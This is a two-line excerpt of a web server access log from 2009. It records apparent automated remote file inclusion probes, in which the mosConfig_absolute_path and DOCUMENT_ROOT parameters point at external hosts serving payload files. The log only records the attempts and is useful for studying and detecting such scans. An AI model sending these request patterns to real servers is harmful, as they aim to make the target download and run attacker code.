193.243.139.4 - - [24/Jun/2009:07:57:35 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
216.139.67.116 - - [24/Jun/2009:07:57:36 -0400] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
